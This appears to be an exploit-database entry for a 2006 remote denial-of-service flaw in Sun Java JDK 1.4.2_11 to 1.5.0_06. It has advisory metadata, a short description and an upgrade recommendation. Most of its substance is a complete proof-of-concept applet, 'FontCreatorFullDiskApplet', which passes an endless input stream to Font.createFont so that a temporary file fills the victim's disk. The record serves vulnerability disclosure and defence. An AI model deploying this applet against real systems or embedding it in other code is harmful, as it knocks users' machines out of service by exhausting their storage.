Sun Java Remote Denial-of-Service Vulnerability

vendor:

Java JDK

by:

SecurityFocus

7.5

CVSS

HIGH

Remote Denial-of-Service

400

CWE

Product Name: Java JDK

Affected Version From: 1.4.2_11

Affected Version To: 1.5.0_06

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Sun Java Remote Denial-of-Service Vulnerability

Sun Java is prone to a remote denial-of-service vulnerability because the application fails to properly handle certain Java applets. Successfully exploiting this issue will cause the application to create a temporary file that will grow in an unbounded fashion, consuming all available disk space. This will likely result in a denial-of-service condition.

Mitigation:

Upgrade to the latest version of Sun Java JDK.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/17981/info

Sun Java is prone to a remote denial-of-service vulnerability because the application fails to properly handle certain Java applets.

Successfully exploiting this issue will cause the application to create a temporary file that will grow in an unbounded fashion, consuming all available disk space. This will likely result in a denial-of-service condition.

Sun Java JDK 1.4.2_11 and 1.5.0_06 are vulnerable; other versions may also be affected.

import java.applet.Applet;
import java.awt.Font;
import java.io.InputStream;

class MIS extends InputStream
{

    MIS()
    {
    }

    public int read()
    {
        return 0;
    }

    public int read(byte abyte0[], int i, int j)
    {
        return j - i;
    }
}


public class FontCreatorFullDiskApplet extends Applet
{

    public FontCreatorFullDiskApplet()
    {
    }
   
    static 
    {
        try
        {
            byte abyte0[] = new byte[0];
            Font font = Font.createFont(0, new MIS());
        }
        catch(Exception exception) { }
    }
}